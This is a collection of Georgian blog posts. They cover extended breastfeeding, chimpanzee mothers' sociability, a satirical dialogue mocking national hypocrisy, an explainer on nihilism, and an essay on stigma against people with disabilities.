ერიკ მაიკლ ჯონსონს ევოლუციური ანთროპოლოგიის კურსდამთავრებული მაგისტრანტი და აწ უკვე დოქტორანტი მეცნიერების ისტორიაში  წერს :  ,,ჩემი ვაჟი უკვე 3 წლის ხდება შემდეგ თვეში და ის კვლავ ძუძუთი კვებაზეა, სხვა სიტყვებით რომ ვთქვათ, ის ტიპური პრიმატია“ .  

ასევე ერიკი ამბობს,რომ ,, Herman & Walter Samuelson Children’s Hospital“ - საავადმყოფოს პედიატრები იმასაც კი ეუბნებიან, რომ ძუძუთი კვების გადამეტებულმა პერიოდმა შეიძლება მომავალში მოზარდს დამანგრეველი ფსიქოსექსუალური პრობლემებიც კი გაუჩინოს.

ამაზე საუბრობს ფსიქიატრი კეიტ ელბოუც( Keith Albow)- ,, რა არის ბუნებრივი ასაკი ძუძუთუ კვების შესაწყვეტად?“ იგი ამბობს, რომ ერთ-ერთი მთავარი რამ, რაც ისწავლა საკუთარი კვლევიდან ადამიანის ევოლუციის შესახებ არის ის, რომ ადამიანები სწრაფები არიან და ჰგონიათ, რომ  რასაც ისინი აკეთებენ, არის ბუნებრივი, ეს კი მხოლოდ და მხოლოდ იმის გამო ხდება , რომ მათ არ აქვთ წვდომა სხვა იმ მაგალითებზე, რომლებიც მათ ცოდნას განსხვავებულად წარმოადგენს.

 ზოგადად, ადამიანის  ტვინი არის იმ ,,მანქანად“აღიარებული, რომელიც ადაპტირებულია, რომ სწრაფად განსაზღვროს კანონზომიერებები საკუთარ გარემოში. ანთროპოლოგმა კატერინე დერუალერმა ( Katherine A. Derrwyler)საკუთარ წიგნში სახელწოდებით ,, ძუძუთი კვება-ბიოკულტურული პერსპექტივები) თქვა ,რომ ახალგაზრდა პრიმატის ძუძუზე კვების თავის დანებების პერიოდი დღეებში რომ გამოვთვალოთ, იქნება შემდეგნაირად : 2,71 უნდა გავამრავლოთ დედის წონაზე გრამებში და შემდეგ 0,56-ზე. ეს კალკულაცია ნამდვილად გამოყენებადია , ნებისმიერი მდედრის ტანის მოცულობის გათვალისწინებით.

                                                            

UNISEF- ის კვლევის მონაცემების მიხედვით კი, მსოფლიოს მოსახლეობის ნახევარი ძუძუთი კვებას აგრძელებს სულ მცირე 2 წლამდე მაინც. თუმცა ეს სულაც არ ნიშნავს ძუძუთი კვების პერიოდის მომენტალურ შეწყვეტას. ის უბრალოდ ნიშნავს, რომ ,,მყარი საკვების“ მიღების პერიოდი იწყება და ძუძუთი კვებასთან ერთად გრძელდება რამდენიმე თვის განმავლობაში ან მთლიანი წელიც კი.

რომ დავუპირისპიროთ ერთმანეთს მსოფლიო ტრენდი ტრადიციულ საზოგადოებებსა და ჩრდილო-დასავლურ ქვეყნებს შორის . აშშ-ს მთავრობის მონაცემები ამბობს, რომ ამერიკელების დაახლოებით 15%  ძიძას ქირაობს 6 თვემდე  ახალშობილისთვის ( როდესაც კანადელებში ეს მაჩვენებელი ბევრად დიდია და საშუალოდ 25%-მდეც კი ადის ). დაახლოებით ამგვარი ვითარებაა დასავლეთ ევროპაშიც ,მაჩვენებელი 15 დან 25 %-მდე მერყეობს და შესაბამისად, ეს იმაზეც მეტყველებს, რომ ახალშობილები უფრო მცირე ასაკში ანებებენ თავს ძუძუთი კვებას და ნორმით დადგენილ პერიოდამდე ვერ სარგებლობენ დედის რძით.

აქ მოცემულია მსოფლიო ჯანდაცვის ორგანიზაციების მიერ რეკომენდირებული პუნქტები, რომლებიც სასურველია,იცოდნენ მეძუძურმა დედებმა.

ძუძუთი კვების ინიციატივა-ბავშვს ჩვეულებირვ უნდა გაუჩნდეს დაბადებიდან რამდენიმე საათში.

ექსკლუზიური ძუძუთი კვება- პირველი 6 თვის განმავლობაში უნდა გრძელდებოდეს.

ხანგრძლივი ძუძუთი კვება- 2 წელი ან მეტი.

თუმცა უნდა ითქვას, რომ გახანგრძლივებულ ძუძუთი კვების პერიოდსაც აქვს დადებითი თვისებები :

1)კვლევებმა აჩვენა , რომ ხანგრძლივი ძუძუთი კვება ( ძირითადად 3 წლამდე ) ამცირებს ორგანიზმის კვების ნაკლებობის   მაჩვენებელს. თუმცა ეს მაჩვენებელი შედარებით მაღალია ისეთ ორგანიზმებში,რომლებშიც უფრო მალე წყდება ძუძთი     კვება.

2)ამგვარი ბავშვები უფრო ნაკლებ შემთხვევებში ავადდებიან,ვიდრე ძუძუს მოწყვეტილი ბავშვები.

გარდა ამ ყველაფრისა, ძუძუთი კვება 12 დან 36 თვემდე პერიოდში ასოცირდებოდა დიარეის გაჩენის რისკის ჩემცირებასთანაც. ძუძუთი კვება იცავს ბავშვებს ზემოაღნიშნული დაავადების დროს წონის კლებისგან.                 რაღა თქმა უნდა, ძუძუთი კვების საკითხი დამოკიდებულია ოჯახზეც, მშობლებმა უნდა გადაწყვტონ თავად, რამდენ ხანს, რა მოცულობით და რა სიხშირით სურთ საკუთარი შვილების ამ სახის კვებაზე ყოლა და როგორ იგრძნობენ თვითონაც თავს კომფორტულად თავიანთ პატარებთან ერთად. თუმცა უნდა აღინიშნოს, რომ შეძლებისდაგვარ, არცერთმა დედამ არ უნდა მოაკლოს პატარას ამხელა ფუფუნების განცდის საშუალება თავიანთ თბილ დედიკოებთან ერთად. :) 

გამოყენებული წყაროები : ,,Breastfeeding and the use of human milk”

                          ,, Duration of Breastfeeding and Risk of overweight- Thomas Harder”

                          http://blogs.discovermagazine.com/crux/2012/05/17/behind-the-time-cover-most-human-societies-dont-get-our-breastfeeding-hang-up/#.V3g5n1R97IV

CultureSocietyLifestyle

,, რატომ არიან მამრობითი სქესის შიმპანზეები უფრო სოციალურები, ვიდრე მდედრობითების და რა გავლენა აქვთ დედებს მათზე?“

$
0
0
Georgian

თითქმის ოთხი დეკადის განმავლობაშიშიმპანზეებში დაკვირვების შედეგად  გამოაშკარავდა, რომ მამრი შიმპანზეების დედები არიან დაახლოებით 25%-ით უფრო სოციალურები ვიდრე მდედრის.  ისინი ორი საათით მეტსაც კი ატარებენ სხვა შიმპანზეებთან ერთად ,ვიდრე მდედრის მშობელი შიმპანზეები.                                                  ზოგადად, არსებობს ტენდენცია,რომ შიმპანზეებს მკაფიოდ აქვთ მამრობითი სქესის დომინანტურობა გამოხატული, შესაბამისად მდედრობითი სქესის ნაშიერებს შეიძლება მოუწიოთ უამრავი ფიზიკური ზეწოლის გამკვლავება ,მეტიც ისინი შეიძლება მკვლელობის მსხვერპლიც კი გახდნენ საკუთარივე სახეობის წარმომადგენელთა მიერ. ასე რომ უფრო უსაფრთხო იქნება მათთვის, თუ მოერიდებიან ისეთ ჯგუფებში ცხოვრებას, რომლებშიც მამრობითი სქესის წარმომადგენლები განსაკუთრებული აგრესიით გამოირჩევიან. თუმცა ამ ყველაფერთან ერთად ყველაზე გასაკვირი ის არის, რომ თავად ამ მამრობითი სქესის მშობელი მდედრებიც კი ამგვარი არჩევანით ხვდებიან სხვა მდედრებს და იმავე აგრესიით ექცევიან მათ, როგორც მამრები.

,, ნამდვილად დამაინტრიგებელია ის ფაქტი, თუ რა ზეგავლენას ახდენს დედის ქცევაზე განსხვავებული სქესის წარმომადგენელი ნაშიერის დაბადება და როგორ უკავშირდება ეს მის სოციალურობას“ -ამბობს ენ პუსეი. ევოლუციური ანთროპოლოგიის პროფესორი Duke-ს უნივერსიტეტიდან.                                        მკვლევრებს სჯერათ, რომ დედა შიმპანზეები თავიანთ ნაშიერ- ახალგაზრდა მამრებს აძლევენ შესაძლებლობას , რომ დააკვირდნენ სხვა მამრების სოციალურ ქცევებს , იმ დროსაც კი, როდესაც ისინი ჯერ კიდევ იმდენად პატარები არიან, რომ დედების ტანზე მიკრული თანაარსებობენ.   ეს აძლევს მამრების მომავალ თაობას იმის საწყის ეტაპს , რომ განივითარონ ის სოციალური ქცევები , რომლებითაც შემდგომში ,,ბატონობენ“ საპირისპირო სქესის წარმომადგენლებზე.                               უნდა აღინიშნოს ,რომ ეს კვლევა ეფუძნება 37-წლიან ყოველდღიურ დაკვირვებას აღმოსავლეთ აფრიკის შიმპანზებზე გომბრეს ტანზანიის ეროვნული პარკიდან. და დღესდღეობითაც Duke-ის ინივერსიტეტის მეცნიერები Anne Pusey-ს ხელმძღვანელობით განუწყვეტლივ აკვირდებიან ამ მონაცემებს ,რათა შიმპანზეთა სახეობაში შესაძლებელი გახდეს უფრო ხანგრძლივ კვლევათა პასუხების დადგენა.

  30-36თვის შიმპანზეების ნაშიერები იწყებენ დედისგან დამოუკიდებლად მოძრაობას და შესაბამისად დედებსაც აღარ უწევთ მათი ტარება ხშირად. სწორედ, ამ პერიოდში მამრი ნაშიერები იწყებენ უფრო აქტიურ ურთიერთობას საპირისპირო სქესის ,,პარტნიორებთან“ ეს მდედრი პარტნიორები კი ბევრად უფრო ასოციალურები არიან, ვიდრე თავად ისინი.         ეს კვლევები კი მომავალში იმასაც შეიძლება დაუკავშირონ, თუ როგორ გამოიხატება სქესთა შორის დამოკიდებულება და ურთიერთქმედება არა მხოლოდ შიმპანზეებში, არამედ ადამიანებში.

იქიდან გამომდინარე, რომ მდედრები ამგვარად ასოციალურებად ყალიბდებიან შიმპანზეებში , ისინი საგრძნობლად დასტრესილები არიან , როდესაც ხვდებიან დიდი შიმპანზეების ჯგუფში, თავისთავად, ეს იმიტომ ხდება, რომ ისინი გრძნობენ მომავალ საფრთხეს, რომელიც მათ ემუქრებათ.   თუმცა საუკეთესო გზა, იმისათვის რომ არ მოხდეს მდედრი შიმპანზეების მკვლელობა, მხოლოდ იმ შემთხვევაში იქნება თუ ჯგუფის 70%-ს  მაინც მდედრი შიმპანზეები წარმოადგენენ.

                             

გამოყენებული წყაროები : ,,Behavioral diversity in chimpanzees and bonobos” 

                         ,, The Chimpanzees of Gombe : Patterns of Behavior"

                          http://today.duke.edu/2014/11/gregariouschimps

CultureWorldLifestyle

ჭეშმარიტი ქართველის ათი მცნება

$
0
0
Georgian

,,მონა არ შეიძლება იყოს პატიოსანი, ის მოვალეა, დროთა განმავლობაში მაინც, გახდეს ნაძირალაო“,– ხშირად იმეორებდა ხოლმე სიურრეალისტი გენადი.

 

   ახლა კი თქმული მისივე, სიურრეალსტ გენოსი, დემო ძაღლისათვის, ახალსა დიღომსა განდეგილობის ჟამს:

   – საყვარელო დემო!.. გადის წლები, მოდიან ახალი თაობები, იცვლებიან ლიდერები, ერთი შეხედვით, გარშემოც ბევრი რამ განახლდა, მუდმივი დარჩა მხოლოდ სქელი სიყალბის ფენა, რომელშიც ჩვენ ვარსებობთ. ტყუილმა იმდენად მოიცვა ჩვენი ბუნება, რომ ის ჩვეული გახდა და კაცს ვერც კი წარმოგიდგენია მისგან გათავისუფლება – თანდათან ხომ ყველაფერს ეგუები. სიცრუე თავს ზემოთ ავიდა და დაგვფარა – ჩვენ მისით ვსუნთქავთ, ძვალსა და რბილს ჟანგბადის მაგიერ ის მიეწოდება. ჩვენ ტყუილის ოკეანეში ჩაძირული გვამები ვართ, ამას არ ვაღიარებთ, საკუთარ თავთანაც ვთალთმაქცობთ და ცოცხლებს ვთამაშობთ.

   – წკმუტუნ – გენო, ამას ხომ ადრეც მეუბნებოდი...

   – მშვიდად დემიკო, ჯერ მომისმინე და შემდეგ მიპასუხე... ზოგადად, თვალთმაქცობა არის ადამიანის მიერ გამოგონილი ერთ-ერთი ხერხი, უცნობ, საფრთხის მატარებელ გარემოებებს რომ შეეგუოს. შიშის დაძლევის ამგვარი ფორმა სავსებით დასაშვებია, თუ ის საწყის რეაქციას წარმოადგენს. პრობლემები მხოლოდ ამ შიშთან შერიგების შემდეგ იწყება...

   პასიური შეგუება არ მოითხოვს დიდ ძალისხმევას, საკუთარი თავის დაძლევასა და დამთრგუნველ გარემოებებთან ბრძოლას – ამგვარი ქცევა ხელსაყრელია. ამიტომ ხანგრძლივი დროის პერსპექტივაში, ადამიანი უხერხულობის დაფარვის მიზნით, საკუთარი მხდალობის ახსნის ათასგვარ ხრიკს მიმართავს – ის ეძებს და პოულობს კიდეც სათაკილო საქციელის გამართლებას. გადაულახავ დაბრკოლებასთან მარცხის აღიარება კი, ცნობილი ფორმულის მიხედვით (,,შიში შეიქმნს სიყვარულსა“), მჩაგვრელის შეყვარებასაც იწვევს. ასე იბადება საკუთარი ლაჩრობის განდიდების სურვილი...

   – ღრრ-ჰავ-ჰავ!

   – დემო, მოცლა მომეც, ვაა!.. ამ თვითგანდიდების ნარკომანიის ფესვები, ალბათ, საუკუნეების სიღრმეში იკარგება. ჩვენ ხომ მლიქვნელობა-მონობის დიდი სტაჟი გაგვაჩნია. ჯერ XIII-XIV საუკუნეების მონღოლთა შემოსევა, შემდეგ არაბთა, სპარსთა თუ ოსმალთა მიერ დაპყრობა, ბოლოს კი რუსეთის იმპერიის ნებაზე მიცემა, ცხადია დიდ დაღს დაასვამდა ჩვენს მენტალობას და იძულებულს გახდიდა ერს შემგუებლობისა და მონური მოხერხებულობის ფოიერვერკები გამოეგონებინა. ამის გამო ქართული ფარისევლობა, რაღაც სპეციფიური, მხოლოდ ჩვენთვის დამახასიათებელი ფენომენია: აღმოსავლური ქვეშ-ქვეშობისა და მელიის ეშმაკობა-ვერაგობის, ავტორიტეტებისა და ტაბუირებული ფასეულობების მიმართ უხმო მორჩილების; ყოველივე ამას კი საბჭოური მონობა და ვირთხის ალღო ემატება და გამოდის ქართული საფირმო ნაზავი!

   – ...წკმუილ...

   – აი, ასე, დემიკო, საყვარელო!.. ბატონყმურ ცნობიერებას საფუძვლად რეალობის ნეგატიური და პასიური აღქმა უდევს. ასეთი პიროვნება მხოლოდ მითების საშუალებით ახერხებს დაუძლეველის დაძლევას – წარმატების მიღწევას და მტრის დამარცხებას. წარმოსახვითი დიდების ეიფორიაში ყოფნისთვის ,,ყმას“ ისტორიული მითები სჭირდება. მეტად მნიშვნელოვანია მისთვის რელიგიური მითებიც, რათა როგორმე მთავარი შიშის – სიკვდილის შიშის დაძლევა შეძლოს და ყოველდღიური ცხოვრების უსამართლობა, სამოთხის მოლოდინით შეიმსუბუქოს.

   მაშ ასე, შეგვიძლია დავასკვნათ– ,,ფარისევლობა მონური აზროვნების პროდუქტია. ფარისევლობა – ეს არის ნიღაბი, რომლის უკან იმალება ტოტალიტარული საზოგადოება! სხვა სიტყვებით, რომ ვთქვა, ჩემო დემო, ფარისევლობა გახლავს საკუთარი მხდალობის დაფარვისა და კოლექტიური ცნობიერებისადმი დამორჩილების (ანუ მონობის) გამართლების ხერხი!

   – ჰავ-ჰავ!

   – ცხადია, ყოველივეს სათავე – თაობების ორმაგი სტანდარტების მორალით ცხოვრებაა. ქართველები მივეჩვიეთ ერთის ფიქრს, მეორეს თქმას და მესამეს კეთებას – ჩვენ ფარისეველთა ერად ჩამოვყალიბდით. ბოლო ლურსმანი კუბოს ფიცარში კი საბჭოეთმა დაგვაჭედა! ჯერ იყო უმოწყალო რეპრესიები, რამაც დაშინებულ ადამიანთა ერთობა – კოლექტივი და ახალი ,,ერის მამები” თუ ,,ზნეობის შუქურები” გამოჩეკა. კომუნისტური ინტელიგენციის მეცადინეობით საბჭოეთმა შეუძლებელი შეძლო – 50-იანი წლების შემდეგ საბჭოთა ადამიანისთვის მონობა ბუმებრივ მოთხოვნილებად გადაიქცა! 

   გამოგონილი ისტორია და მითები ქართველებს ძვალსა და რბილში გაგვიჯდა – მუდმივი მართლობით ტკბობის უძლიერესი ნარკოტიკი იმდენად აუცილებელი გახდა ჩვენთვის, რომ მის გარეშე ვერც კი ვძლებთ.

   ფარისევლობავ – ქართველების კისერზე გამობმული ლოდი უნდა გერქვას შენ!

    – წკავწკავ!

    – ახლა კი მთავარზე გადავალ: ფარისევლობავ, შენ გიმღერ ქებასა და გიძღვნი ათსა მცნებასა!

    – იეს!

1.ჭეშამარიტრი ქართველი და ფარისეველი – სინონიმებია: ჭეშმარიტი ქართველი მოვალეა მტრებისგან დაიცვას ეროვნული ფასეულობები; ფარისეველი კი, ერთი მხრივ, დარწმენებულია, რომ ივერია გაბრწინდება, ხოლო ინგლისი დაიძირება, და მეორე მხრივ, თავქუდმოგლეჯილი ოცნებობს ამერიკულ შმოტკებსა თუ იაპონურ ჯიპზე; 

2.ჭაშმარიტი ქართველის შეხედულებით, ქართველი ქალი წარმოადგენს უპრეცენდენტო წესიერებისა და სინაზის ნიმუშს. ქართველი ქალი შეიძლება ბოზობდეს კიდეც, მაგრამ მაინც ამერიკელთან შედარებით უპირობო უმანკოებასა და კდემას ინარჩუნებს!

3.თვალთმაქცი ვალდებულია საუბარში ხშირად იხმაროს არქაიზმები, ილაპარაკოს პათეტიკური ტონით. ფარისეველი გულისამრევად ხშირად ახსენებს სამშობლოს და მომაკვდინებელი კლიშეებით ჯერ თვითგვემით იწყებს – ,,ჩვენ ილიას ვესროლეთ“, ,,საბა წვერით ვათრიეთ“ – ხოლო შემდეგ იგივე ავტორიტეტებით მაღლდება – ,,ჩვენ შოთას, ილიას, აკაკისა და ვაჟას ერი ვართ!“;

4.თვალთმაქცის დევიზია: ,,ჰეროიკული წარსულისა თუ გმირების სათნოებების თავის თავზე პროეცირებიდან – საკუთარი პერსონის ქება-დიდებამდე!“. ფარისეველი უდრეკად მოხიბლულია საკუთარი სიწმინდითა და განათლებულობით;

5.ფარისეველი მუდამ ხაზს უსვამს, რომ ის ფულის, ტაშისა თუ ჩინ-მედლებისთვის კი არ ირჯება, არამედ მხოლოდ სამშობლოს სიყვარულის კეთილშობილური იდეალები ამოძრავებს და მზადაა ეროვნული ღირსებისთვის თავიც გასწიროს.

6.თუ მლიქვნელს შეუვალი არგუმენტებით კედელზე მიაყენებ, ის ვალდებულია ხელიდან გაგისხლტეს და იწყოს თემიდან თემაზე ხტომა.

7.ჭეშმარიტ ქართველს რეალური საქმეები არც სჭირდება, ის წარმოსახვითი უპირატესობის რასისტული მითებით საზრდოობს. ფარისეველი მუდამ სხვისი გაკიცხვითაა გართული, რადგან მხოლოდ ასე წარმოჩინდება მისი არარსებული სათნოებები – ის მკაცრად შეაგონებს გარშემომყოფთ, არ განიკითხოო და იმავდროულად, გულში მუდამ იმეორებს ლოცვას: ,,ჩვენი ძალა – წარმატებულის ძაგებასა და სიძულვილშია!“.

8.ჭეშმარიტი ქართველი მუდამ სხვისი მორალის სადარაჯოზე დგას. მოვლენა, პიროვნება ან უკიდურესად უარყოფითი –,,იუდა” უნდა იყოს, ან კეთილშობილი – ,,ქრისტე, ღვთისმშობელი, წმინდა გიორგი”. ის არ სცნობს შუქჩრდილებს, მისთვის მთავარია მორალური ნორმების ოდნავ დარღვევისას სასტიკი აღშფოთება;

9. ნამდვილი ფარისეველი ყველგან და ყველაფერში ეძებს ეშმას ხრიკებს (იგივე ,,666“), პოულობს კიდეც მათ და, რაც შეიძლება აბსურდული მითებით ასაბუთებს მსოფლიო მასონიზმის შეთქმულების თეორიას. ჭეშმარიტი ქართველი მოვალეა გააფთრებით ებრძოლოს არშემდგარ მამათმავალთა აღლუმებს!

10. დაბოლოს მთავარი! ჭეშმარიტი ქართველი გულით ,,ერთმორწმუნე“ რუსეთს ეთაყვანება, რასაც ასე გამოხატავს: ,,რუსეთმა ჩვენ გადაშებას გადაგვარჩინა! მართალია, დღეს ის ოკუპანტია, მაგრამ ამ გარყვნილ ამერიკელებს, ისევ რუსები მირჩევნია!“. შემდეგ ამ მერყევ კონსტრუქციას რუსული ლიტერატურის სიდიადით ამყარებს და ასე შეუმჩნევლად უყვარდება ვლადიმერ პუტინიც.

– წკმუტუნ-წკავწკავ...

P.S.

   ჩემო დემიკო, საკუთარი დიდებით ტკობას, რომ არ მივეცე, აქვე დავძენ... გემახსოვრება, თანამედროვე სარწმუნოების სახელოვანი აპოლოგეტი – მართალი ციალა... რაღა თქმა უნდა, მან მაჯობა და ეროვნული სულიერების არსი გაცილებით სხარტად ჩამოაყალიბა:

,,1. ქართველები უჯრედის დონეზე (მემბრანა, ციტოპლაზმა, მიტოქონდრიები, გოლჯის კომპლექსი, ლიზოსომები, რიბოსომები, ბირთვი და სხვა), გენეტიკურად (დნმ-რნმ), თქვენ წარმოიდგინეთ, ბიოქიმიურადაც (ცილები, ლიპიდები, ნუკლეინის მჟავა, ნახშირწყლები და სხვა) წმინდა სისხლის მართლმადიდებლები არიან. ეს, თავის მხრივ, გვაძლევს სითამამეს დავასკვნათ, რომ ივერიელები მართალ ერთა შორისაც კი ყველაზე ჯიშიანი მართლები ვართ!

2. ჩვენი რწმენა ერთადერთი სწორი სწავლებაა და ვინც მას არ მიიღებს ან ჯოჯოხეთის კუპრში ამოიხრუკება, ან გეენის უძღები მატლის ლუკმა გახდება!“.

  ისიც გემახსოვრება, დემარიონ ჩემო, რომ ამ ერთი ამოსუნთქვით წარმოთქმულ ტირადას მართალი ციკო იტალიური პარტიზანული სიმღერით ასრულებდა. მოდი, ჩვენაც მას ავყვეთ: ,,ავანტი პოპოლო, ალა რისკოსა, ბანდერა როსა, ბანდერა როსა...“.

– ყმუილ-ყმუილ-ყმუიი-ი-ილ...

სიურრეალისტ გენადისა და დემოს დიალოგი ჩაიწერა ზურა ოდილავაძემ, წელსა 2016, მკათათვე

CultureSocietyLifestyleფარისევლობამონობატოტალიტარული საზოგადოებაათი მცნება

რა არის ნიჰილიზმი?

$
0
0
Georgian

მიზეზი რატომაც ამას ვწერ არის ის, რომ ხშირად ვხედავ ხალხი არასწორად იგებს ვინ არიან ნიჰილისტები. ნიჰილისტები არიან “ნორმალური” ადამიანები, ისეთივე ადამიანები როგორც შენ. მათ შესაძლოა აქვთ მსგავსი მორალი, მსგავსი ფასეულობები და მსგავსი იდეები რაც მათ მოტივირებულს ხდის. არსებობს მხოლოდ ერთი რამ რაც გამოყოფს ნიჰილისტებს სხვა ხალხისაგან, უბრალო გააზრება იმისა, რომ არ არსებობს ობიექტური “საზომი” და გზა, რომ გავზომოთ მორალური “სიმართლე”, ანუ გავიგოთ თუ რომელი მორალური ღირებულებები არის უფრო ობიექტური და “ჭეშმარიტი” რადგანაც ყოველი მორალურობის ცნება სუბიექტის მიერ არის მოაზრებული და აბსტრაქტული ცნებაა. ეს გავს იმას, როდესაც ბავშვი გააანალიზებს, რომ მისი შიში “ბნელი” და ირაციონალურია. ეს არ ხდის მას უგრძნობელს და ფაქტობრივად მას ისევ ეშინია რაღაც გარემოებების, იმის მიუხედავად თუ რამდენად ხშირად ეუბნება იგი თავის თავს, რომ ეს შიშები აზრს მოკლებული და ილუზორულია. ჩვენ შეიძლება ხშირად ვუმეორებდეთ ჩვენს თავს, რომ სიყვარული და შიში უბრალო ილუაზიაა, მაგრამ ჩვენ მაინც შევიგრძნობთ მათ, იმის გამო რომ ეს ადამიანის ბუნებაა, ადამიანი სუბიექტია და ვერასოდეს იქნება 100%-ით ობიექტური. სიყვარულისა და შიშის უარყოფა ჩვენ არ გვხდის უგულოსა და უგრძნობ ადამიანებს, ინდეფერენტულებს სხვისი სისუსტეების მიმართ. ჩვენ ისევ თანავუგრძნობთ ერთმანეთს სიყვარულითა თუ შიშით. იგივე ხდება ნიჰილისტსა და მორალს შორისაც. ადამიანმა შეიძლება გაიაზრო მორალურობის ირაციონალური მხარე, მაგრამ მაინც იყო მორალური, იმის გამო, რომ სწორედ ადამიანის ბუნებაა, რომ იყოს მორალის მქონე არსება.

1). “ნამდვილი” ნიჰილისტები ამორალურები არიან! - ეს ფრაზა მცდარია, რადგან ყველა “ნამდვილ” ნიჰილისტს შეიძლება ჰქონდეს მორალური ღირებულებები, შენი მსგავსიც კი. (მორალურობა ინსტინქტია რომელიც ადამიანს დაბადებიდან დაჰყვება და არ არის “ღმერთისაგან ბოძებული”) ერთადერთი განსხვავება ისაა, რომ ნიჰილისტებს არ სჯერათ “ობიექტური მორალის” არსებობის.

2). ნიჰილისტებს არ სჯერათ არაფრის! - ისევ მცდარია, ნიჰილისტებს არ სჯერათ იმის, რისიც სხვა ადამიანებს სჯერათ და ეს რაღაც არის: 1. ”ობიექტური ფასეულობები” 2. “ობიექტური, აბსოლუტური მორალი”, 3. ”ობიექტური მნიშვნელობა” (მაგალითად “სიცოცხლის აზრი”)

3). ნიჰილიზმი წინააღმდეგობრივია! - თუ ერთი წინააღმდეგობრივობა მაინც გიპოვიათ ოდესმე, სადმე ნიჰილისტურ აზროვნებაში გთხოვთ მეც მაცნობოთ და გამხადოთ ინფორმირებული.

4). ნიჰილისტთან დავით შენ ნიჰილისტი აღარ ხარ! - კიდევ ვიმეორებ, ნიჰილისტებს როგორც სხვა ადამიანებს შეიძლება ჰქონდეთ სხვადასხვა ფასეულობები. ადამიანებს აქვთ იმის საჭიროება, რომ გამოხატონ თავიანთი თავი. ნიჰილისტობით ისინი არ თმობენ ამ ფასეულობას, მათ უბრალოდ იციან, რომ მათი ფასეულობები დამოკიდებულია მხოლოდ და მხოლოდ მათ აზროვნებაზე და მათი ფასეულობები და მორალური ღირებულებები არის სუბიექტური. ნიჰილისტებს გააჩნიათ მორალი, ფასეულობები და მოტივაცია ისევე როგორც სხვა დანარჩენ ადამიანებს. ისინი უბრალოდ იაზრებენ იმას, რომ ჩვენ ყველას არ გვაქვს ერთნაირი მორალი და ფასეულობები. ნიჰილისტი აანალიზებს და ხვდება, რომ ერთი ადამიანის “ნაგავი” მეორე ადამიანისთვის შეიძლება “საგანძური” იყოს, რომ არ არსებობს უჩინარი “ფასი” ყველაფერზე რაც ყველაფრის “ღირებულების” განმსაზღვრელი იქნება. სხვა მხრიდან რომ შევხედოთ, ნიჰილისტებს არ სჯერათ, რომ არის რაიმე “უჩინარი” ძალა რომელიც სთავაზობს ადამიანებს ობიექტურ ფასეულობებს დედამიწაზე, ამის საპირისპიროდ ისინი თვლიან, რომ მორალი დამოკიდებულია ადამიანზე რომელიც ადგენს მას და დამოუკიდებელია გარე სამყაროსაგან. შესაძლოა მორალური ხედვა ადამიანთა არის მსგავსი მხოლოდ იმიტომ, რომ ჩვენ შევიმუშავეთ გარკვეული ფასეულობები ევოლუციური გზით, რომ გადავრჩეთ.

CultureSocietyLifestyleნიჰილისტინიჰილიზმიმორალიმსოფმხედველობაფასეულობებიფილოსოფია

ბიჭი ზედმეტი ქრომოსომით

$
0
0
Georgian

შეზღუდული შესაძლებლობის მქონე პირთა უფლებების შესახებ გაერთიანებული ერების 2006 წლის კონვენციის პირველი მუხლის თანახმად, შეზღუდული შესაძლებლობის მქონე პირებს მიეკუთვნებიან პირები, ფიზიკური, ფსიქიკური, ინტელექტუალური ან სენსორული მყარი დარღვევებით, რომელთა ურთიერთქმედებამ სხვადასხვა დაბრკოლებებთან შესაძლოა ხელი შეუშალოს ამ პირის სრულ და ეფექტურ მონაწილეობას საზოგადოებრივ ცხოვრებაში, სხვებთან თანაბარ პირობებში.

შეზღუდული შესაძლებლობები არ არსებობს!!!

ამას ყოველდღიურად ამტკიცებენ თუნდაც პარასპორტსმენები, სხვებზე რომ არაფერი ვთქვათ. მაგრამ ეს არის მახინჯი ტერმინი, რომელსაც ვერ გავექცევით.

ძალიან დიდი მუშაობაა საჭირო საზოგადოებიდან კიდევ უფრო მახინჯი ტერმინის „ინვალიდი“-ს ამოძირკვისათვის. ყოველდღიურად, საათში ვინ იცის რამდენჯერ, ჩვენი დაუფიქრებელი სიტყვებით, შეურაცხყოფას ვაყენებთ მათ. შეიძლება შეურაცხყოფა გაუაზრებელი იყოს, მაგრამ ეს არ ამართლებს ჩვენს საქციელს.

„შეზღუდული შესაძლებლობის მქონე პირთა უფლებების შესახებ“ გაეროს 2006 წლის კონვენციის თანახმად, შეზღუდული შესაძლებლობის მქონე პირებს, სხვა პირთა თანაბრად აქვთ:

  • სიცოცხლის უფლება;
  • კანონის წინაშე თანასწორობის უფლება;
  • პიროვნების თავისუფლებისა და უსაფრთხოების უფლება;
  • მოქალაქეობისა და გადაადგილების თავისუფლება;
  • დამოუკიდებელი ცხოვრებისა და საზოგადოებაში ჩართვის უფლება;
  • აზრისა და რწმენის გამოხატვის თავისუფლება;
  • ინფორმაციის ხელმისაწვდომობის უფლება;
  • განათლების უფლება;
  • შრომისა და დასაქმების უფლება;
  • პოლიტიკურ სა საზოგადოებრივ ცხოვრებაში მონაწილეობის უფლება;
  • კულტურულ, სპორტულ, გასართობ ღონისძიებებში მონაწილეობის უფლება;

თუმცა, საქართველოში ეს ყველაფერი მხოლოდ ფურცლებზე რჩება. არავინ იცის, არავის უნახავს, ან იციან და არ აინტერესებთ.

სტიგმა კლავს!

საზოგადოებაშია პრობლემა, ჩვენვე ვიხრჩობით უცოდინრობის, გაუაზრებლობისა და არაჰუმანურობის ჭაობში. ვფიქრობთ მხოლოდ საკუთარ თავზე, საკუთარ კეთილდღეობაზე, იმაზე, თუ სხვა რას იფიქრებს.

ჩემს ქალაქში ერთი ბიჭი ცხოვრობდა, დაუნის სინდრომით. თუმცა ძნელია მის ცხოვრებას ცხოვრება დავარქვათ. ფრანც კაფკას ნაწარმოების ერთ-ერთი ტრაგიკული გმირი, გრეგორ ზამზაც კი უკეთეს პირობებში ცხოვრობდა ვიდრე ის ბიჭი. სამწუხაროდ სახელი არ მახსოვს, ისე საგულდაგულოდ მალავდნენ მისი ოჯახის წევრები, რომ არსებობაც კი შემთხვევით გავიგე, როცა ერთ დღეს სახლიდან გაიქცა. სადარბაზოს კართანვე დაიჭირეს და „მეზობლები რას იტყვიან“ - შიშით ისევ სახლში ჩაკეტეს. ჰოდა ასე, სახლში ჩაკეტილი ებრძოდა ყოველ დღეს. მზის, მწვანე მინდვრის, ჰაერისა თუ ზღვის გარეშე და მხოლოდ იმიტომ, რომ ერთი ქრომოსომით მეტი ჰქონდა.

მხოლოდ ოჯახი არ იყო ამ ყველაფერში დამნაშავე. დამნაშავეები ვიყავით ჩვენც, მთელი კორპუსი, ქუჩა, ქალაქი, რაიონი !!!

